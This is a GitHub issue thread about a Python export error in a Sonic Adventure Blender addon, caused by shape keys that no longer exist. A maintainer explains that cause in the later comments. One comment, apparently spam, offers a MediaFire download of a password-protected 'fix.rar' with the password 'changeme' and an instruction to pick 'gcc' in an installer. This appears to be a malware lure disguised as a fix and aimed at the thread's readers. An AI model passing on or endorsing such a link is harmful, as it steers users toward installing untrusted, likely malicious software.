### ISSUE TITLE
E0002 DC New Scene - Always showing Python error when exporting.

### ISSUE THREAD

**Issue by Luks-18** [X-Hax/SonicAdventureBlenderIO#30]
It's the error shown in this image, it started happening after creating some shape keys for the mouth, but the error shows up even when I don't include the custom scene in the event when exporting, which makes me believe something went wrong with the addon in that project.

![image](https://github.com/user-attachments/assets/335915c0-132e-4705-8995-2f734f58c38b)

Here is the project file:

[E0002 Alternate Clash 3.zip](https://github.com/user-attachments/files/16764191/E0002.Alternate.Clash.3.zip)

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Justin113D** [comment]
The error comes from shape keys not existing, which blender informs you about:
![image](https://github.com/user-attachments/assets/53d61e55-d491-4222-9fbb-3b65428179f9)
I can add in a failsafe to not cause a crash and instead print a warning, but this shouldn't happen in the first place

**Comment by Justin113D** [comment]
Usually blender recognizes when a shape key has changed name, and adjusts the animations as well.
However, this only occurs to animations that are attached to the object of the mesh too.
It also only occurs one-way, from the mesh to the animation. If other meshes make use of the animation, then their shape key names will not be adjusted and fail as well.
